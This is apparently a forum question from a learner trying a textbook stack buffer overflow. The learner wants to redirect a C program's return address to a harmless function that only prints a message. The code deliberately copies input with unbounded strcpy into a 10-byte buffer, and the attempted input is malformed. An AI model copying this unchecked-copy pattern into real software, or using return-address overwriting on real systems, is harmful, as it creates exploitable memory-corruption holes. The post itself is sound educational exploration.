Reputation: 29
Buffer Overflow Explpoit Demo
I am trying to see stack smashing via buffer overflow in action. More precisely, I am trying to change the return address in the stack so that the return, instead of calling to the caller function, redirects the control to my code. But my half baked knowledge seems to be coming in the way. My code is below:
#include<stdio.h>
#include<string.h>
int main(int argc, char **argv)
{
int a;
func(argv[1]);
printf("This message must not be printed");
return(0);
}
int func(char *arg)
{
char buffer[10];
strcpy(buffer,arg);
printf("The buffer says..[%s/%p].\n",buffer,&buffer);
return (0);
}
void virus()
{
printf("I am a virus");
exit(0);
}
I wish the execution of function "virus" obviously, instead of the control going back to main() after "func" executes. My compilation command is:
gcc -g -O0 <filename.c> -fno-stack-protector
Also, I have disabled Address space randomization option of kernel. I tried to give the input 12345678911111111111111110x7ffc7829bb36 (i.e. 1-9 followed by 16 1's). The reason is 9 bytes of buffer + 8 bytes address pointer + 8 bytes old frame pointer (so total 16 1's). The hex at the end is the result of addition of 16 bytes to the address of "buffer" variable. Upon execution, the control doesn't go back to main function alright, but it doesn't go to my "virus" function either. The messages from "func" are displayed and then a seg fault message is appended. What possibly is wrong here? My guess is that I don't know how to calculate the target address even using gdb debugger. Any help will work for me. Thx
Upvotes: 0
Views: 114